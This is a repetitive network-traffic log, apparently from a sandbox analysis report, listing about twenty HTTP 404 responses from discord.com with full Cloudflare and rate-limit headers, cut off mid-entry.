Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:02:59 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498980x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=al14tV3RO5HAUGlpzldwbNVdyOqSgAYjGAGFl4u9J%2BcEcrKeUkb72GhVyFq5a9Ky84w2Bp5mq4I4sw0FeQVfqtietjjAnh1BOzkJj6gv7FtFwM86yxaFxgvn7O0p"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=4ad72b55e11a23022160cd227dced0a61e8bc086-1735498979; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=3mp86m6fg2yt6TrvqhFhIX3HYUwXx6EX7Cx2XPSFZHg-1735498979222-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c2b3b6d6a52-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:00 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498982x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SmQgN8Bkb5p4tC9eLmADdG0ZD1Cc9uZkEiQKS29%2F3XCJGAAArUH8Y096R1MN%2BnvVxkGTp%2FVjYewXvg%2BNbh9Pyy14XlfQE5U%2BTr6HXiO22nai33yJGaOzTkt3Q%2BSV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=23823cab609d971f0f82be1af4b6dcf33a9d3964-1735498980; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=8bvJYm8vneycF0wLjDAnGKYytTPnB_jNbePUIaNbag8-1735498980996-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c367eb54301-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:02 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498983x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ew2eSJHs21nMyIaCjS1fgAB0hIte%2BxNqw079TaXbkJeR2kBRXsRDEFS1ke8E771MYFhMKHTcR%2BNnaMv5nekeQQ7xaAScDPrMvqA27kIgu1zTD0h53XctQdusGxEu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=a83e1b02b8bf0e6c4fe8f6315cbb2f437fc4f7b6-1735498982; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=sDbDnP8c3EQsAzdxnKSvOTrh8pv1NFi2WqQ8ocMCSi0-1735498982119-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c3ddc55726b-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:02 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498984x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2plpiH9sNqMfQqwohta98Ka8UWFcWZMzC1vZHEvKndpWvfGa6c8qshUDlJq%2FlKHmKJXBD2MBHAdeiJ2X48xh2LtmPEOUra4oIG1C2ZGo9u6beLMPa%2B9YR8vMALGW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=a83e1b02b8bf0e6c4fe8f6315cbb2f437fc4f7b6-1735498982; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=dyytUMLAmtE7eC2.A3TjG8YytCENP06uko0MPzuc500-1735498982814-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c41cff84331-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:03 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498985x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dz10feN7fAn99NPMZP773e%2FFXNtbjo%2BKdyH0xJmtsLNoAHsgKkPCzK%2FYVKg%2B92W%2FAPyxxiNNk7lOukeltG%2FQRYsoshBYvtWWIpEbjMe3udtBQPhrLSAh4Frw1OoB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=9e3e66dc681d70b9937e1195946526fe189d7f3e-1735498983; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=Q1t2swnpuPMmYcqSWEivjLPu1w11cnctRRnKVlKNp5o-1735498983981-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c4978d7c46b-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:04 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498985x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qZJxoqwcVQaHvDuV%2FCIWEie3dTkamZ7TxGBqwIFZZ7fEPMDzCO1dQdfjdf6CWkU7TgAZgqwSc2QTROmiMG3J6boLjT9eoRLGPTqf492UkMn9M%2BGxUsl60mHocZt2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=938ae12eef9d59bb3bc3310a43663fa79e78fdbd-1735498984; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=pd.ELW.Q88rABbitgAjHxgPJTNaWDoB4Xx66RC66ZmQ-1735498984585-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c4ce8faf793-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:05 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498987x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y66lmSQjYqsL0eNaQvvIJkkpXxVp4%2Fgx%2FuYk%2BwzB4A5JLjXfQaYCaxDsd62qlQ0w2elCKRHjllh473aNq6Rb0zA709LCmdxGsdhJw5H2kphtmk4vZ6u0OYPyh6IL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=29a15a11205d521fade2fce24bb51dc81e422ff7-1735498985; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=h_xZ24ShyDMMmxOICgAN9wP.Mrjy0u4wF8iOCpj4Bzg-1735498985928-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c558a715e6d-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:06 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498987x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r7yP4ivm6RbandCcVRbVHU%2BPjKRFxmv60taRCz6t%2BXoMo%2Bsu93nT%2BXmZsVLssAnscBgqWoEs8jm6H1fg1PI71Px4%2FkDIU1u0cjmb%2F1FV4fVymoiWlXFppWs4CyrV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=bb459069412c3cf48a5fe98c4b8ff9406e04cfa2-1735498986; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=uBW5PRmawx..EwZVxQbmIEzqtncmSXqXKacr2iVRNDQ-1735498986400-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c5838e3de96-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:07 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498989x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gwMCpDWiehpHf74gXesUnb7hdkoZQiiZ1hHfH2YpMWiq%2BrB3NdT0uEAXduMBc%2FAUtEUDrHrKX8pQjfFOv95PALfxgsr7Vuo772yaUb3Ufs%2BgT9H3nTiVVoyEInj%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=7140a4c162eba94fe993e9a3dad9aa978c39aba2-1735498987; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=q2rHGilsPvHFAVAUKthGeNmueMjTBtYbRjgAE1rzpIw-1735498987755-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c60cba9334e-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:08 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498989x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lQbYUEQvUxh4unl42W32h2hvnzy%2FVE1VhKAcnSHKgzNI8vf6kiPw8L9dSBXiNd7aOqwu5g1up0OAin%2BSbGYDUlB08twXNlcOERMZCgRbsOevk%2FG02SBkLrCfC5dK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=76024ff7c673dd46b2083c4197580eab4ea9b999-1735498988; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=Ja1hOyMgMitpJaE__uQf1KC8kG3HAw68YQJA5aX7UMI-1735498988174-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c634b418c4e-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:09 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498990x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xokVQfuvoAClj1c%2ByMqPdjrzg1Zr9Gw2VfYw8z8123Z5fNoPD4%2Fu%2BJILF%2BYGmQi0Iy6CW%2BHPi3ppDvOsypNvKWZVz0gzbKzGbD2cfdTRna6zeQzuZt5PX6qwSRsw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=6ae2029e6d62e7c4d01080c22969844e20f5513b-1735498989; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=Lczx2jYGdoVNX3XRIDeW71T0puvRCLmtqEeDWUYtWyY-1735498989565-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c6c6dcac43b-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:09 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1735498991x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iDOvtni0VwcIGnbYbPwH4DsdnEDV0MP4ymC8Vq3X4QS1bpwKRxutQb0GONB5mnM8ujraBCQn4i2UQ13SeKEtXYqMMKGV4PS%2FWIEFj0wgQVF6Rwpdlp4LG37XOWGP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=6ae2029e6d62e7c4d01080c22969844e20f5513b-1735498989; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=dqOyUfTbJkXOw06SOns21wWU9LBc7MknpuXaV2iB.us-1735498989958-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c6e4ab141fb-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:11 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498992x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uCRmBRF8aPSMLa2pli4fc8mQ6bjRNruDAiJAaePSy%2BP1NKqG%2BmWTgY590J%2Bq6i97xFPNK36CGVEp3zpkDxhHUZwX6g5%2FXyr7MGZhLm7owWaCpZQFz%2Bdgl0UPlSvi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=3abb171b141d78de30efa618112c77a211c14849-1735498991; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=PIiBxOZSEMWRtZ6KlEsfGNbUdS7i2dK3KICs.cGrzJk-1735498991459-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c782e3d438c-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:11 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1735498993x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e0KIqW47IG6PsgHSRgkbiHgd63Qf0tLBI96qeGHVtrKAMxf%2BXrEZpBxXbII7cZSQCpliW93BlUyIKMYr7IfEGzVgf%2BqUQqSRnN9gmu2CCfmYpws5vWMSLChNs55W"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=3abb171b141d78de30efa618112c77a211c14849-1735498991; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=rk_XeBQB43AsWEzr_p3i6OYMloKE0dQslHP6ElTH6bc-1735498991847-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c7a59854241-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:12 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498993x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iDxeDBbD1twnpOf33mkDXNidjOwSMPHDivs28Eceg7NFAgr1tcf%2F6avo%2BQ%2BGLq1WaCABsraHpPaCzLjv3SXUZF0VBgKY7aebsQm0yr9gUhibEAa3qNGo%2BkSkOkBj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=fb0620a1d440d8d9dc581fe7feecd809ce02036c-1735498992; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=7cTCxMQ23W0MXsOeJV5mu.iCoZ1Nwr3PWsHZBdn1xuo-1735498992556-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c7e987f42b2-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:13 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498994x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wHbxt5snp5LWE70zpj9teEQNkBY5uug3zFoqxfcAISGB53d9ORqG1qWUvMg12FR3WMsZZxyRVUbbzUoWj9hTBRUop47pMI9sHG6asOdGSVMi4y4xMkh0kbILCtzL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=c5c8ad22de9d9335f6f22020bcf3d643bcef42d3-1735498993; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=mAuKRqK4k312Eyps0ASto5iRBKJrj2RnDNjqZZE6xZo-1735498993233-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c8359fc80df-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:13 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498995x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P4cCz%2B6GTFKiNj27jMa3nOMnoHSuBzbzDJU5QYNhOymm66tk1DlM4KLpR%2B9AiDe3vhwJ6Ls20n4Pfb4C7X4q%2BBgBFKlI9ASyxyofWpYyAeWsKsPxc4wgOZ7OT9p7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=c5c8ad22de9d9335f6f22020bcf3d643bcef42d3-1735498993; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=mZUP9t.G9wKv88k84hir6t_BZNsAS7L6i21JDbhTAeM-1735498993889-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c87692ef5f8-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:14 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498995x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=52bY%2BB%2Bf8fFGJ%2BeR13r1vnKn0Vznx6g%2F%2FPLNNhfDhKAjNIETkVIZfLmMC47suoMCgLlyumogkTOuIrzLJOv0XRl3mmYof0r6THRsPMGskkWnmQEkcDZEuhLHnpj%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=2cd2b22600556013a937bfbb25f8ced4b5bdb3d6-1735498994; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=miv5VEcgMGvSszyEVQy4p4k8LoEzjiH9RqpR.yn2p4s-1735498994342-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c89dfda7c99-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:15 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498996x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zP9Fknv8PBgA1CPMHV23fygZA0AhUPGA57WxUg8oSoqTnYd7xTuPb7z1RZzdkh3gIwB0gYg1n8fW%2FVFV65ig72K4qBKR5JZQC8RN9g6XTjo8rVNbdRNZ2G2IWM4p"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=82c40b0008dad80de20b0eba30cc0737be6c58ea-1735498995; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=JRzLCGxbGi4.GEFzKlJaBRuFMimBaCAVS62_SeegYnI-1735498995036-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c8e78b8f793-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:15 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498997x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KQlHNLXZsoWsyTiTbJ5DMD7tODH1q2E1JwvMhvJi2rovB78oYoxne%2Ftg2WLTF%2BbNOOwCZxpL6Qt4n1vnkwxQEnfW3ieuEAQCIAth1ih2n8P8z2wwJFz4h0X1GqNG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: 